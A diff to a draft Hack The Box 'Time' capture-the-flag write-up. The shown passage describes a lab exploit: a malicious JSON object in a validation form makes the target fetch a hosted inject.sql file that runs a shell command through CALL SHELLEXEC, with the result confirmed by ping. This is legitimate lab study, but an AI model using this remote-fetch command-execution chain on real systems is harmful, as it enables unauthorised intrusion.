tpetersonkth/tpetersonkth.github.io/_drafts/HTB-Time-Writeup.md

 CALL SHELLEXEC('ping -c 10 10.10.14.4')
 {% endhighlight %}

 We place the content above in a file named "inject.sql".
 Then, we start a python web server in the directory where we saved this file by executing  `python3 -m http.server 80` and start Wireshark by executing `wireshark`.
-We then substitute `localhost:8000` for our IP `10.10.14.4` in the malicious JSON object seen earlier, paste it into the validation form and press "PROCESS".
+We then substitute `localhost:8000` for our IP `10.10.14.4` in the malicious JSON object [seen earlier]({{path}}#malicious-JSON-object), paste it into the validation form and press "PROCESS".

-<div id="malicious-JSON"></div>
+<div id="malicious-JSON-send"></div>
 ![sendSSRFPayload](/assets/{{ imgDir }}/sendSSRFPayload.png)

 ![webServer](/assets/{{ imgDir }}/webServer.png)

-After a couple of seconds, the target hosts requests the `inject.sql` file from the python web server and we can see ICMP packets being sent to us from the target.
+After a couple of seconds, the target host requests the `inject.sql` file from the python web server and we can see ICMP packets being sent to us from the target.

 ![wireshark](/assets/{{ imgDir }}/wireshark.png)